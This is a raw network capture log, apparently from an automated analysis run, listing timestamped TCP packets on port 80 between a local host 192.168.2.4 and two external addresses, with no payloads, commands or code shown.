Apr 26, 2024 10:27:04.540095091 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.540175915 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.540177107 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:04.540177107 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:04.540225983 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.540268898 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:04.540294886 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.540316105 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.540344954 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.540415049 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.540421009 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:04.540469885 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:04.540492058 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.540527105 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.540577888 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.540626049 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:04.540647030 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.540690899 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.540695906 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:04.540750980 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.540796995 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.540827990 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:04.540855885 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.540909052 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:04.540926933 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.541008949 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.541074991 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:04.541095972 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.541152954 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.541207075 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:04.541227102 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.541259050 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.541315079 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.541316032 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:04.541368961 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.541399956 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.541421890 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:04.541474104 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.541506052 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.541532993 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:04.541562080 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.541615963 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:04.541666985 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.541726112 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.541755915 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.541780949 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:04.541831970 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.541887045 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.541889906 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:04.541944027 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.541973114 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.541996956 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:04.542035103 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.542082071 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:04.680347919 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.680448055 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.680448055 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.680500031 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.680510998 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.680625916 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.680680037 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.680718899 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.680773973 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.680855036 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.680917025 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.680963993 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.681025982 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.681092024 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.681149960 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.681162119 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.681216955 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.681247950 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.681303024 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.681379080 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.681416988 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.681431055 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.681469917 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.681520939 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.681577921 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.681619883 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.681677103 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.681713104 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.681755066 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.681767941 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.681826115 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.681827068 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.681864023 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.681885958 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.681920052 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.681938887 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.681977034 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.681993961 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.682013988 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.682024956 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.682065964 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.682138920 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.682190895 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.682298899 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.682353973 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.682368994 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.682420015 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.682439089 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.682476997 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.682497978 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.682523966 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.682545900 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.682600975 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.682615042 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.682658911 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.682671070 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.682734966 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.682740927 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.682790995 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.682811022 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.682871103 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.682881117 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.682919979 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.682950974 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.682971954 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.683021069 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.683058977 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.683073997 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.683111906 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.683159113 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.683196068 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.683221102 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.683258057 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.683295965 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.683358908 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.683396101 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.683444977 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.683466911 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.683504105 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.683514118 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.683547974 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.683573008 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.683620930 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.683643103 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.683711052 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.683751106 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.683805943 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.683851004 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.683897972 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.683921099 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.683958054 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.683973074 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.684005022 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.684026003 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.684077978 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.684096098 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.684144020 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.684149981 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.684202909 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.684221029 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.684259892 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.684273958 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.684298038 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.684324980 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.684334993 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.684350967 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.684381962 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.684406042 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.684442997 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.684458017 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.684490919 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.684514046 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.684561014 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.684612989 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.684668064 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.684680939 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.684747934 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.684782028 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.684822083 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.684859037 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.684883118 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.684895992 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.684921980 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.684931040 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.684967041 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.685028076 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.685036898 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.685075045 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.685086966 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.685123920 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.685175896 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.685214043 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.685231924 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.685251951 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.685264111 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.685290098 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.685301065 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.685338020 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.685359955 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.685415030 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.685553074 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.685606003 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.685621023 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.685676098 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.685873985 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.685911894 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.685928106 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.685955048 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.685966969 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.686006069 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.686017036 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.686055899 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.686075926 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.686114073 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.686129093 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.686163902 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.686187983 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.686225891 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.686238050 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.686268091 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.686289072 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.686317921 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.686337948 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.686377048 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.686388016 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.686418056 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.686476946 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.686526060 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.686645985 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.686701059 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.687163115 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.687201977 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.687217951 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.687238932 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.687241077 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.687275887 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.687283993 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.687321901 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.687345982 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.687382936 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.687397003 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.687432051 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.687452078 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.687490940 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.687500000 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.687534094 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.687561989 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.687614918 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.687632084 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.687680006 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.687731981 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.687769890 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.687778950 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.687813997 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.687839985 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.687891960 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.687932968 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.687972069 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.687983036 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.688018084 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.688040972 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.688077927 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.688107014 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.688117981 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.688134909 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.688179970 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.688204050 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.688252926 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.688273907 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.688323975 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.688344955 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.688394070 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.688414097 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.688466072 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.688483953 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.688535929 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.688558102 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.688596964 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.688608885 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.688636065 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.688643932 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.688673973 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.688680887 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.688718081 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.688777924 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.688813925 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.688827038 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.688858986 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.688884020 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.688922882 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.688977003 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.688992023 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.689035892 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.689060926 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.689097881 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.689107895 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.689141989 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.689168930 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.689222097 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.689239025 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.689275980 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.689289093 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.689313889 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.689321995 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.689368010 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.689385891 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.689439058 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.689515114 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.689552069 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.689567089 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.689595938 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.689624071 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.689677000 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.689692974 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.689714909 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.689719915 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.689762115 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.689879894 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.689930916 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.689950943 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.690005064 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.690053940 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.690105915 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.690123081 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.690160990 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.690171003 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.690198898 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.690206051 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.690237999 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.690268040 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.690304995 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.690319061 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.690347910 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.690373898 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.690411091 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.690414906 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.690454006 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.690479994 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.690516949 CEST	80	49733	185.172.128.76	192.168.2.4
